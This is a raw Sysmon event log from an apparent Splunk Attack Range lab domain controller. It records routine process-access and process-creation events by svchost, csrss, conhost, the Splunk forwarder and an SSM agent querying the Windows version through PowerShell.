13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.087{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.995{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.992{59A5CD1D-8E5B-6005-5500-00000000A301}37483696C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.993{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
